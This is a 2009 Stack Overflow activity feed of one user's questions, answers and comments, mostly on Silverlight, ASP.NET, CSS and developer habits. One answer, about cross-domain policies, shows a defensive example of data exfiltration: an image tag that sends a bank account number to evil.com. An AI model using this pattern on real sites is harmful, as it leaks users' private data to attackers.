User Jon Galloway - Stack Overflow most recent 30 from stackoverflow.com 2009-12-18T05:09:51Z http://stackoverflow.com/feeds/user/5 http://www.creativecommons.org/licenses/by-nc/2.5/rdf http://stackoverflow.com/questions/1231484/which-is-the-future-of-web-development-html5-or-silverlightor-other-ria-framewo/1235126#1235126 4 Answer by Jon Galloway for Which is the future of web development: HTML5 or Silverlight(or other RIA framework)? Jon Galloway 2009-08-05T19:04:12Z 2009-12-12T01:52:23Z <p>It's a false question. The answer is: Yes, HTML5 and RIA frameworks are both the future of the web.</p> <p>HTML5 has been called "the future of the web" for a long time. The problem is that it's always off in the future, and not the near future. The <a href="http://blogs.techrepublic.com.com/programming-and-development/?p=718" rel="nofollow">target release date for HTML5 is 2022</a> (!!!). While features will trickle into browsers in the meantime, it'll still be years before you can reliably do something as simple as show video on a webpage without a RIA plugin.</p> <p>Aha, you say... it may be a ways off, but you've admitted that HTML5 is the future!</p> <p>The problem is that there will continue to be commonly requested features that browsers won't widely support, and at that point you need something that lets you extend the browser. That's where RIA's come in. Yes, things like canvas, video, and speedy Javascript will keep raising the bar, but I think RIA platforms like Flash and Silverlight will always have an opportunity to provide essential features that the (widely installed) browsers don't.</p> http://stackoverflow.com/questions/1229897/linq-select-all-children-from-an-object-hierarchy 0 LINQ - Select all children from an object hierarchy Jon Galloway 2009-08-04T20:56:10Z 2009-12-11T02:23:49Z <p>I have a <code>List</code> of objects which contain a string array as one of their properties. I want to get a distinct string array containing all the values.</p> <p>My object looks like this:</p> <pre><code>public class Zoo { string Name { get; set;} string[] Animals { get; set;} } </code></pre> <p>Some zoos may have only one animal, some may have many. What would be the simplest Lambda expression or LINQ query to get me a unique list of all animals at all the Zoos in <code>List&lt;Zoo&gt;</code>?</p> http://stackoverflow.com/questions/1814921/how-can-i-know-if-two-rectangles-collide-in-silverlight-3/1814945#1814945 1 Answer by Jon Galloway for How can I know if two rectangles collide in Silverlight 3? Jon Galloway 2009-11-29T07:50:38Z 2009-11-29T07:50:38Z <p>Andy Beaulieu has a <a href="http://www.andybeaulieu.com/Home/tabid/67/EntryID/160/Default.aspx" rel="nofollow">good post</a> on the various collision detection methods in Silverlight 3.</p> http://stackoverflow.com/questions/33242/how-can-i-find-unused-images-and-css-styles-in-a-website 10 How can I find unused images and CSS styles in a website? Jon Galloway 2008-08-28T19:54:02Z 2009-11-21T09:55:51Z <p>Is there a tool or methodology (other than trial and error) I can use to find unused image files? How about CSS declarations for ID's and Classes that don't even exist in the site?</p> <p>It seems like there might be a way to just spider the site, profile it, and see which images and styles are never loaded.</p> http://stackoverflow.com/questions/1344122/favicon-png-vs-favicon-ico-why-should-i-use-pngs-instead-of-icos 9 favicon.png vs favicon.ico - why should I use PNG's instead of ICO's? Jon Galloway 2009-08-27T22:39:16Z 2009-11-18T17:33:21Z <p>Other than the fact that PNG is a more common image format, is there any technical reason to favor favicon.png vs. favicon.ico?</p> <p>I'm supporting modern browsers which all support PNG favorite icons.</p> http://stackoverflow.com/questions/591694/url-encoded-slash-in-url/1735100#1735100 1 Answer by Jon Galloway for URL-encoded slash in URL Jon Galloway 2009-11-14T18:15:45Z 2009-11-14T18:15:45Z <p>One other option is to use a querystring value. Very lame, but simpler than custom encoding.</p> <pre><code>http://localhost:5000/Home/About?100%2f200 </code></pre> http://stackoverflow.com/questions/12406/is-it-possible-to-slipstream-the-visual-studio-2008-sp1-install 6 Is it possible to slipstream the Visual Studio 2008 SP1 install? Jon Galloway 2008-08-15T15:48:58Z 2009-11-10T10:49:46Z <p>From what I've read, <a href="http://blogs.msdn.com/astebner/archive/2008/08/11/8849574.aspx" rel="nofollow">VS 2008 SP1 and Team Foundation Server SP1 packages are traditional service packs that require you to first install the original versions before you will be able to install the SP</a>.</p> <p>Is there a way, supported or not, to slipstream the install?</p> http://stackoverflow.com/questions/1929/anyone-using-the-colemak-keyboard-layout 3 Anyone using the Colemak keyboard layout? Jon Galloway 2008-08-05T05:25:10Z 2009-11-10T09:28:50Z <P>Jeff mentioned the <A href="http://colemak.com/" rel="nofollow">Colemak keyboard layout</A> on Twitter. Seems pretty cool - most of the benefits of Dvorak, but a much less drastic change from the standard QWERTY layout. For instance, control-z, control-x, control-c, and control-v all stay the same.</P> <P>Anyone tried it?</P> <P></P> http://stackoverflow.com/questions/352039/sites-which-support-crossdomain-xml-to-allow-flash-and-silverlight-access 3 Sites which support crossdomain.xml to allow Flash and Silverlight access Jon Galloway 2008-12-09T07:40:11Z 2009-11-05T16:27:44Z <p>Please list <strong>one</strong> site which allows Flash/Silverlight access via crossdomain.xml file. Vote for your favorite sites.</p> <p>The goal is to build an up to date list of sites which can be directly accessed via Flash/Silverlight without a server-side proxy. </p> http://stackoverflow.com/questions/147530/real-hlsl-ide-debugger/1551440#1551440 0 Answer by Jon Galloway for Real HLSL IDE/debugger Jon Galloway 2009-10-11T18:50:28Z 2009-10-11T18:50:28Z <p>Take a look at <a href="http://blog.shazzam-tool.com/" rel="nofollow">Shazzam</a>. It doesn't feature interactive debugging, but it's pretty easy to edit and refresh.</p> http://stackoverflow.com/questions/1488311/how-to-limit-access-to-a-silverlight-enabled-data-service/1490670#1490670 1 Answer by Jon Galloway for how to limit access to a silverlight-enabled data service? Jon Galloway 2009-09-29T05:12:27Z 2009-09-29T05:12:27Z <p>Silverlight webservice security follows the same patterns you'd use for ASP.NET security, especially services exposed to AJAX. The best way to do make use of ASP.NET's authentication.</p> <p>RIA Services is an even better way to handle this. It rides on top of the ASP.NET authorization, but validates on both the client and server-side automatically to combat service spoofing. It let you take care of both client and server-side authorization by adding attributes to your methods indicating that the method requires authorized access, and by which groups or users if you need to be specific.</p> <p>In addition to wire-side security and obfuscation, remember that clients can attach a debugger to Silverlight applications running in their browser. See this <a href="http://msdn.microsoft.com/en-us/magazine/cc982154.aspx#id0090184" rel="nofollow">example from MSDN Magazine's Security IQ Test, November 2008</a>.</p> http://stackoverflow.com/questions/1069722/sending-username-and-password-through-email-after-user-registration-in-web-applic/1481605#1481605 0 Answer by Jon Galloway for sending username and password through email after user registration in web application Jon Galloway 2009-09-26T16:39:46Z 2009-09-26T16:39:46Z <p>As mentioned in comments, you might want to look at OpenID. The most secure way to manage passwords is to eliminate them.</p> http://stackoverflow.com/questions/1461026/hosting-silverlight-without-iis/1461585#1461585 3 Answer by Jon Galloway for Hosting Silverlight without IIS Jon Galloway 2009-09-22T17:56:48Z 2009-09-23T17:36:34Z <p>Silverlight is just a standard HTML <code>&lt;object&gt;</code> so it can be delivered by anything that will serve HTML. However, it seems like a strange architecture for a client/server solution. For what you're describing, I'd look at either:</p> <ul> <li>Silverlight out-of-browser application</li> <li>WPF application delivered via ClickOnce</li> <li>Silverlight application that is loaded from a website but communicates with your existing backend using <a href="http://msdn.microsoft.com/en-us/library/cc296248%28VS.95%29.aspx" rel="nofollow">Silverlight's socket support</a></li> </ul> <p>Can you explain why you're looking at building a custom server instead of one of the above approaches?</p> http://stackoverflow.com/questions/1461747/net-formatting-strings-good-practices-for-commenting/1461797#1461797 2 Answer by Jon Galloway for .NET Formatting strings - good practices for commenting? Jon Galloway 2009-09-22T18:27:44Z 2009-09-22T18:27:44Z <p>You could look at <a href="http://haacked.com/archive/2009/01/04/fun-with-named-formats-string-parsing-and-edge-cases.aspx" rel="nofollow">Phil Haack's NamedFormat extension</a>, which allows you to use formats like </p> <pre><code>NamedFormat("{{{foo}}}", new {foo = 123}) </code></pre> http://stackoverflow.com/questions/1461631/is-css-used-anywhere-besides-web-browsers/1461679#1461679 0 Answer by Jon Galloway for Is CSS used anywhere besides web browsers? Jon Galloway 2009-09-22T18:09:00Z 2009-09-22T18:09:00Z <p>Yes. It's used in XUL, the system that Firefox and other Mozilla applications are built with. The XULRunner allows other developers to build <a href="http://en.wikipedia.org/wiki/XULRunner" rel="nofollow">XUL based applications; see this list on wikipedia</a>.</p> http://stackoverflow.com/questions/1454158/creating-video-from-wpf-silverlight-animation/1455529#1455529 1 Answer by Jon Galloway for Creating video from WPF/Silverlight animation Jon Galloway 2009-09-21T16:49:01Z 2009-09-21T16:49:01Z <p>If you have Expression Encoder, you can do the following:</p> <ol> <li>Create a blank movie that has as many frames as your animation (you can change the length later if you get it wrong) </li> <li>Use the XAML Animation overlay option to add your XAML-based animation </li> <li>Render out the animation to WMV</li> <li>Convert the video from WMV to AVI (many free tools will do this)</li> </ol> <p>I believe the <a href="http://www.microsoft.com/expression/try-it/default.aspx#PageTop" rel="nofollow">free version of Expression Encoder</a> will handle this. </p> <p>If Expression Encoder won't work for you, you can also use screen capture software like Jing or Camtasia.</p> http://stackoverflow.com/questions/1452278/silverlight-and-flash-and-javascript-cross-domain-policies/1453328#1453328 1 Answer by Jon Galloway for Silverlight and Flash and Javascript cross domain policies Jon Galloway 2009-09-21T07:57:56Z 2009-09-21T07:57:56Z <p>Misuse of auth cookies (XSRF, some XSS scenarios) is just part of the problem. It's also pretty easy to send information from a "good" site to an "evil" one via querystring (e.g. grab some data from a bank page and send it to evil.com by including <code>&lt;image src="http://evil.com/1px.gif?bankaccount=1122334455"/&gt;</code></p> <p>Blocking cookies might limit access from a bad site to a good one, but you've also got to guard the cases where script injection or other attacks expose data in a trusted site which could then be transmitted to a bad site, and that doesn't require cookies.</p> http://stackoverflow.com/questions/1453248/what-is-silverlight-mediastreamsource-audiobufferlength-measured-in/1453270#1453270 5 Answer by Jon Galloway for What is Silverlight MediaStreamSource.AudioBufferLength measured in? Jon Galloway 2009-09-21T07:37:18Z 2009-09-21T07:37:18Z <p>Milliseconds. See Pete Brown's posting <a href="http://community.irritatedvowel.com/blogs/pete%5Fbrowns%5Fblog/archive/2009/07/19/Silverlight-Synthesizer-Source-Code-%5F1320%5F-MediaStreamSource-Raw-Sound.aspx" rel="nofollow">here</a>.</p> http://stackoverflow.com/questions/1451539/reduce-xap-size-setting-whats-the-benefit/1452197#1452197 0 Answer by Jon Galloway for Reduce XAP Size Setting - What's the Benefit ? Jon Galloway 2009-09-20T22:32:46Z 2009-09-20T22:32:46Z <p>The whole reason for keeping XAP size small is so that your application loads as quickly as possible. This is important: even on a faster connection, a bloated XAP can take extra seconds to load, which can be long enough for your users to leave your site.</p> <p>While Linq is only accounting for 46KB, there are other cases where this can make a bigger deal. For instance, the SyndicationFeed class makes it really easy to handle RSS and ATOM feeds, but it weighs in at 114KB.</p> <p>Application library caching helps in two ways:</p> <ol> <li>It allows for sharing common DLL's between applications, so if another application has already pulled down a system DLL, your app can just reference it.</li> <li>It allows your application updates to be smaller, since the framework DLL's won't change betwen XAP versions.</li> </ol> http://stackoverflow.com/questions/25707/how-do-you-track-your-hours 60 How do you track your hours? Jon Galloway 2008-08-25T06:06:42Z 2009-09-19T23:13:01Z <p>Every programming job I've had has required me to track my hours, entering them into a system once a week. I've never been good at it. For the past few years, I've been running <a href="http://timesnapper.com" rel="nofollow">Timesnapper</a>* on all my machines, and on the night before hours were checked I'd slog through the records and painstakingly enter the hours in.</p> <p>The alternative, of course, is to enter the time as I work, but I've never been able to stick to that. I get busy, or in the zone, and I forget about it.</p> <p>What do you recommend?</p> <p>*Timesnapper has some timesheet integration, but I haven't been able to get it to work with my development work, since some of my time spent browsing the web is development related, while some of it isn't.</p> http://stackoverflow.com/questions/1445527/calling-a-function-in-silverlights-code-behind-from-an-aspx-code-behind/1449217#1449217 0 Answer by Jon Galloway for Calling a function in silverlight's code behind from an aspx code behind Jon Galloway 2009-09-19T18:46:38Z 2009-09-19T18:46:38Z <p>You might want to explain more of what you're trying to accomplish than how you're trying to accomplish it. For instance, you can maintain a <a href="http://msdn.microsoft.com/en-us/library/dd470106%28VS.96%29.aspx" rel="nofollow">duplex connection between client and server</a>, allowing you to "push" information down from your ASP.NET application to your Silverlight object. There are a lot of other lightweight alternatives that don't require a full-featured webservice.</p> <p>Why do you like to be able to call Silverlight methods from your ASP.NET code?</p> http://stackoverflow.com/questions/1448898/firefox-and-silverlight/1449154#1449154 1 Answer by Jon Galloway for Firefox and Silverlight Jon Galloway 2009-09-19T18:17:34Z 2009-09-19T18:17:34Z <p>I'm guessing that the problem is either:</p> <ol> <li>The Silverlight object tag or Javascript is using a 100% height and width div, which <a href="http://codebetter.com/blogs/peter.van.ooijen/archive/2009/01/27/firefox-and-the-100-div-revisited.aspx" rel="nofollow">doesn't work in Firefox</a> unless all the parents have height and width set. You can verify this is the problem by setting a background color for the entire Silverlight object. If so, you can either specify a pixel height and width, or you can make sure height and width are set for all the parent elements for the Silverlight object.</li> <li>You may be setting the height and width before they're available. <a href="http://msdn.microsoft.com/en-us/library/bb979791%28VS.95%29.aspx" rel="nofollow">It's recommended that you access them in the OnResize event (see the "Important Note" on this MSDN page)</a>. What event are you setting them from?</li> </ol> http://stackoverflow.com/questions/17175/whats-your-top-feature-request-for-silverlight 9 What's your top feature request for Silverlight? Jon Galloway 2008-08-19T23:16:20Z 2009-09-19T16:22:47Z <p>I'll take away the obvious one here: mic and webcam support. Other than that, if you ran the Silverlight team, what would your highest priority be for Silverlight v.Next?</p> <p>Disclaimer: If we get some good responses, I'll pass them along to folks I know on the Silverlight team.</p> <p><strong>UPDATE</strong>: The best place to report Silverlight feature requests now is the UserVoice site: <a href="http://silverlight.uservoice.com/pages/4325-feature-suggestions" rel="nofollow">http://silverlight.uservoice.com/</a></p> http://stackoverflow.com/questions/1275695/automated-transcription-software/1445809#1445809 1 Answer by Jon Galloway for Automated transcription software Jon Galloway 2009-09-18T17:16:52Z 2009-09-18T17:16:52Z <p>I've looked into this a little. I tried the Microsoft Speech API but got very poor results. I've been wanting to <a href="http://cmusphinx.sourceforge.net/sphinx4/src/apps/edu/cmu/sphinx/demo/transcriber/README.html" rel="nofollow">look into the CMU Sphinx project, especially the Transcriber demo</a>.</p> http://stackoverflow.com/questions/1434284/when-does-asp-net-remove-expired-cache-items/1435853#1435853 1 Answer by Jon Galloway for When Does Asp.Net Remove Expired Cache Items? Jon Galloway 2009-09-16T22:29:32Z 2009-09-16T22:29:32Z <p>Expired items aren't immediately removed from the cache, they're just marked as expired. You don't get a callback until a cache miss. I ran into this back in the ASP.NET 1.1 days, <a href="http://weblogs.asp.net/jgalloway/archive/2005/05/07/406056.aspx" rel="nofollow">and it hasn't changed</a>.</p> <p>There may be cases where expired items are removed immediately - such as if there's low memory and high CPU - but you can't count on it.</p> <p>I usually use a timer that reloads the cache on a regular basis.</p> http://stackoverflow.com/questions/1422191/leveraging-hobby-experience-to-get-a-job/1422407#1422407 4 Answer by Jon Galloway for Leveraging hobby experience to get a job Jon Galloway 2009-09-14T15:50:50Z 2009-09-14T15:56:19Z <p>Start participating in open source development. That's the only real way to shortcut the "need experience to get experience" problem.</p> <p>Open source participation is referencable, and it means a lot more to me as a hiring decision maker than "hobbiest" programming because it means that you're able to develop and support applications that other people will use, and code that other people might see.</p> <p>You can get a jump on this by mining your portfolo for applications other people might want and publishing them as open source projects right away. Then your resume can potentially reference open source applications which were started x years ago.</p> http://stackoverflow.com/questions/1644/what-good-technology-podcasts-are-out-there/1911#1911 12 Answer by Jon Galloway for What good technology podcasts are out there? Jon Galloway 2008-08-05T04:59:43Z 2009-09-14T09:21:21Z <p>Brad's list is pretty good. I also listen to:</p> <ul> <li><a href="http://www.sparklingclient.com/" rel="nofollow">Sparkling Client</a> (Silverlight specific)</li> <li>Jon Udell's <a href="http://perspectives.on10.net/" rel="nofollow">Perspectives</a> series</li> <li><a href="http://herdingcode.com" rel="nofollow">Herding Code</a> (shameless plug for a podcast I put on with Kevin Dente, Scott "lazycoder" Koon, and K. Scott Allen. We recently <a href="http://herdingcode.com/?p=36" rel="nofollow">interviewed Jeff Atwood about Stack Overflow</a>, discussing both how the site is designed and the technology behind it.</li> </ul> http://stackoverflow.com/questions/1416211/how-to-compare-two-files-text-in-windows/1416248#1416248 0 Answer by Jon Galloway for How to compare two files (text) in Windows? Jon Galloway 2009-09-12T21:51:31Z 2009-09-12T21:51:31Z <p>If you've got very simple requirements, there are some online text differenceing options, such as <a href="http://www.textdiff.com/" rel="nofollow">http://www.textdiff.com/</a></p> <p>But as others have said, WinMerge is awesome and free.</p> http://stackoverflow.com/questions/1412364/silverlight-image-stretchuniform-fail-for-portrait-sized-images/1412574#1412574 0 Answer by Jon Galloway for Silverlight Image Stretch="Uniform" Fail for Portrait Sized Images Jon Galloway 2009-09-11T18:31:28Z 2009-09-11T21:46:36Z <p>I just tried this with a tall image and it worked fine. I suspect that the problem is with the Image element's container - it's actually showing the entire image, but the top and bottom are being clipped off.</p> <p>Here's what I used to test:</p> <pre><code> &lt;UserControl xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" x:Class="Temp_Delete.MainPage" Width="640" Height="480"&gt; &lt;Grid x:Name="LayoutRoot" Background="White"&gt; &lt;Image Source="Tall.png" Stretch="Uniform"&gt;&lt;/Image&gt; &lt;/Grid&gt; &lt;/UserControl&gt; </code></pre> <p>UPDATE: All your nested borders are throwing it off since they don't have a defined height. I'd use an ImageBrush on the top level border:</p> <pre><code>&lt;UserControl xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" x:Class="Temp_Delete.MainPage" Width="640" Height="480"&gt; &lt;Grid x:Name="LayoutRoot"&gt; &lt;Grid.ColumnDefinitions&gt; &lt;ColumnDefinition Width="9"/&gt; &lt;ColumnDefinition Width="30"/&gt; &lt;ColumnDefinition Width="30"/&gt; &lt;ColumnDefinition Width="*"/&gt; &lt;ColumnDefinition Width="30"/&gt; &lt;ColumnDefinition Width="50"/&gt; &lt;ColumnDefinition Width="30"/&gt; &lt;ColumnDefinition Width="9"/&gt; &lt;/Grid.ColumnDefinitions&gt; &lt;Grid.RowDefinitions&gt; &lt;RowDefinition Height="*"/&gt; &lt;RowDefinition Height="30" /&gt; &lt;/Grid.RowDefinitions&gt; &lt;Border BorderBrush="Black" Grid.Row="0" Grid.ColumnSpan="8" BorderThickness="1, 1, 1, 0"&gt; &lt;Border.Background&gt; &lt;ImageBrush Stretch="Uniform"/&gt; &lt;/Border.Background&gt; &lt;Border BorderBrush="Black" BorderThickness="9,9,9, 0"&gt; &lt;Border BorderBrush="Gray" BorderThickness="1, 1, 1, 0"&gt; &lt;StackPanel VerticalAlignment="Center" HorizontalAlignment="Center"&gt; &lt;MediaElement Height="Auto" Width="Auto" Visibility="Collapsed" AutoPlay="true" Stretch="Fill" MediaFailed="SilverlightMediaPlayer_MediaFailed" Name="previewMediaElement"/&gt; &lt;/StackPanel&gt; &lt;/Border&gt; &lt;/Border&gt; &lt;/Border&gt; &lt;/Grid&gt; &lt;/UserControl&gt; </code></pre> <p>May take a little tweaking to get all the borders to display correctly, but you can set the padding / margin on the container elements if that's important to you.</p> <p>Can you verify if your image works in that XAML? Can you post more of your XAML so we can see the context?</p> http://stackoverflow.com/questions/1411394/how-to-become-a-faster-programmer/1411984#1411984 3 Answer by Jon Galloway for How to become a "faster" programmer? Jon Galloway 2009-09-11T16:30:11Z 2009-09-11T21:11:01Z <p>Here's what works for me:</p> <ol> <li>Break your work down into small tasks which are (1) defined in scope (2) short - e.g. 2 hours.</li> <li>Start the day by writing them down on a paper, in order. Draw some lines through - stuff you expect to get done before lunch, stuff you'll get done by end of day, etc.</li> <li>Work your list, crossing items off as you go.</li> <li>Time box things - if something's starting to drag, give yourself a time limit to research before you ask for help, or solve in a simpler manner.</li> <li>If possible, structure your work so that you're publicly committing to these timeframes - entering estimates in bug tracking, etc.</li> <li>If you catch yourself killing time researching, reading, etc., then invert the order - for example, allow yourself a 10 minute reward if you successfully complete a 1 hour task on schedule.</li> </ol> <p>I've seen several comments that you should spend less time on Stack Overflow. If you're using it right, Stack Overflow should make you more efficient, not less. Steer clear of discussions and focus on using it to get work done.</p> http://stackoverflow.com/questions/1183595/subsonic-3-and-multiple-pk-columns/1183628#1183628 Comment by Jon Galloway on SubSonic 3 and multiple PK columns Jon Galloway 2009-10-26T18:06:38Z 2009-10-26T18:06:38Z Yes, it's a hack - I only proposed it in case you were really stuck. However, I'd call a table with multiple PK's a hack, too. http://stackoverflow.com/questions/1516351/c-silverlight-ria-services-authentication-step-by-step-how-to Comment by Jon Galloway on C# Silverlight RIA Services Authentication - Step By Step How-To?! Jon Galloway 2009-10-04T18:34:35Z 2009-10-04T18:34:35Z Can you explain why Brad's tutorial was totally useless to you? That would help in recommending other resources. http://stackoverflow.com/questions/1517008/commercial-map-controls Comment by Jon Galloway on Commercial Map Controls ? Jon Galloway 2009-10-04T18:31:43Z 2009-10-04T18:31:43Z Can you explain how the Google and Bing licenses prevent you from using them? http://stackoverflow.com/questions/1399328/sending-contained-object-over-ria-services/1400457#1400457 Comment by Jon Galloway on Sending contained object over RIA Services Jon Galloway 2009-09-30T16:52:56Z 2009-09-30T16:52:56Z Can you post how you got it to work and accept your answer? That way the next person that hits this problem will know how to solve it. http://stackoverflow.com/questions/1399328/sending-contained-object-over-ria-services/1400457#1400457 Comment by Jon Galloway on Sending contained object over RIA Services Jon Galloway 2009-09-29T16:24:01Z 2009-09-29T16:24:01Z Oh, you're right. The references I posted by the people who created RIA Services must be wrong. Glad you figured out the real way to do it. http://stackoverflow.com/questions/8952/storing-a-file-in-a-database-as-opposed-to-the-file-system/8981#8981 Comment by Jon Galloway on Storing a file in a database as opposed to the file system? Jon Galloway 2009-09-28T14:31:48Z 2009-09-28T14:31:48Z Scalability and availability seem to have been pretty well thought through - see this whitepaper: <a href="http://msdn.microsoft.com/en-us/library/cc949109.aspx" rel="nofollow">msdn.microsoft.com/en-us/library/&hellip;</a> http://stackoverflow.com/questions/1473855/how-to-programatically-set-response-statuscode-different-than-200-ok-in-asp-net-a/1474313#1474313 Comment by Jon Galloway on How to programatically set Response.StatusCode different than 200 OK in ASP.NET Application and still serve content to client successfully? Jon Galloway 2009-09-24T21:47:06Z 2009-09-24T21:47:06Z More about that here: <a href="http://weblogs.asp.net/scottgu/archive/2006/04/09/App_5F00_Offline.htm-and-working-around-the-_2200_IE-Friendly-Errors_2200_-feature.aspx" rel="nofollow">weblogs.asp.net/scottgu/archive/&hellip;</a> http://stackoverflow.com/questions/1461026/hosting-silverlight-without-iis/1461585#1461585 Comment by Jon Galloway on Hosting Silverlight without IIS Jon Galloway 2009-09-23T17:47:25Z 2009-09-23T17:47:25Z Thanks. Why don't you want to run IIS? You can host a Silverlight application on any webserver, if it's the OS/licensing - Apache, etc. http://stackoverflow.com/questions/17175/whats-your-top-feature-request-for-silverlight/1447673#1447673 Comment by Jon Galloway on What's your top feature request for Silverlight? Jon Galloway 2009-09-19T16:23:16Z 2009-09-19T16:23:16Z Great point, Luke! I updated the question text. http://stackoverflow.com/questions/1434284/when-does-asp-net-remove-expired-cache-items/1442211#1442211 Comment by Jon Galloway on When Does Asp.Net Remove Expired Cache Items? Jon Galloway 2009-09-18T17:27:09Z 2009-09-18T17:27:09Z Excellent, thanks for digging into this. I'm pretty sure this has improved since I dug through it in Reflector several years ago. Also, ASP.NET 4 includes additional enhancements for caching, some of which are listed here: <a href="http://www.asp.net/learn/whitepapers/aspnet40/" rel="nofollow">asp.net/learn/whitepapers/aspnet40</a> http://stackoverflow.com/questions/1434284/when-does-asp-net-remove-expired-cache-items/1435853#1435853 Comment by Jon Galloway on When Does Asp.Net Remove Expired Cache Items? Jon Galloway 2009-09-17T01:27:55Z 2009-09-17T01:27:55Z I'd love to be proven wrong! I haven't seen callbacks happen reliably in .NET 1.1, 2.0, or 3.5. Do you have something that's pinging the site keeping the site alive? Can you give more specifics on your code and hosting? http://stackoverflow.com/questions/1156278/css-how-to-scale-entire-web-page-with-css/1156526#1156526 Comment by Jon Galloway on CSS: How to scale entire web page with CSS? Jon Galloway 2009-09-17T00:23:52Z 2009-09-17T00:23:52Z I can't argue with that thorough test suite, @porneL. You tested two obsolete versions of IE, didn't mention which Firefox you tested... I tested in all current browsers. Try it. http://stackoverflow.com/questions/1431397/firefox-engine-library Comment by Jon Galloway on Firefox engine library Jon Galloway 2009-09-16T07:04:50Z 2009-09-16T07:04:50Z Dupe - <a href="http://stackoverflow.com/questions/26147/is-it-possible-to-embed-gecko-or-webkit-in-a-c-net-win-form-just-like-a-webview" rel="nofollow" title="is it possible to embed gecko or webkit in a c net win form just like a webview">stackoverflow.com/questions/26147/&hellip;</a> Great question, though! http://stackoverflow.com/questions/1395246/is-there-a-way-to-hide-the-nth-item-in-a-list-with-css/1395307#1395307 Comment by Jon Galloway on Is there a way to hide the nth item in a list with CSS? Jon Galloway 2009-09-10T00:00:57Z 2009-09-10T00:00:57Z bill - I agree, hope I didn't sound argumentative. Can't wait for wide browser support of CSS3! http://stackoverflow.com/questions/1400563/windows-7-to-read-text-aloud Comment by Jon Galloway on Windows 7 to read text aloud Jon Galloway 2009-09-09T15:59:25Z 2009-09-09T15:59:25Z Not programming related - belongs on superuser